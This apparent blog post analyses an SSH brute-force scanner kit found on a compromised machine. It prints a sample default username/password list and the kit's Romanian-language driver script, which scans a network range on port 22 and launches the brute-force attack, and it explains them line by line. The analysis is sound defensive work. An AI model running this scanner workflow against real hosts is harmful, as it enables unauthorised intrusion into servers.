Irregular Expressions

Apr 24 2013   9:13PM GMT

SSH Brute Force Scanner – Part 2

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

The ‘data.conf’ file is a list of usernames and passwords to attempt. It contains 24,024 combinations.

root root
admin admin
test test
guest guest
webmaster webmaster

The included file ‘find’ appears to be a network scanner of some sort. I might come back to this but it is not really what I am looking for.

‘test.txt’ seems to be the output from running ‘auto’, but it looks like it was missing some flags. It is a 2.0M file with nothing but the following in it.

./assh ; ./assh ; ./assh ;

‘unix’ appears to be what ties this all together now that we kinda know what each part is about.

if [ $# != 1 ]; then
echo "[+] Folosim : $0 [b class]"

echo "[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]"
echo "[+] SSH Brute force scanner : user & password [+]"
echo "[+] Undernet Channel : #UnixCoD [+]"
echo "[+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+]"
./find $1 22

sleep 10
cat $1.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100
rm -rf $1.find.22 ip.conf
echo "[+] UnixCoD Scanner a terminat de scanat !"

Since they were not nice enough to put English comments in, we have to use Google translate to tell what it says. But I think we can figure it out from here.

The ‘if’ statement at the start is looking to make sure an option was provided on the command line.

if [ $# != 1 ]; then

I am pretty sure it is looking for a network range, the next command is executing ‘find’ and providing it with what was given on the command line ‘$1’ and a port. It’s port 22, no surprise here if they are looking for ssh servers.

./find $1 22

Next it creates a file called ‘ip.conf’ that contains a unique list of all of the hosts that ‘find’ located.

cat $1.find.22 |sort |uniq > ip.conf

Part 3

 Comment on this Post

There was an error processing your information. Please try again later.
Thanks. We'll let you know when a new response is added.
Send me notifications when other members comment.

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to:

Share this item with your network: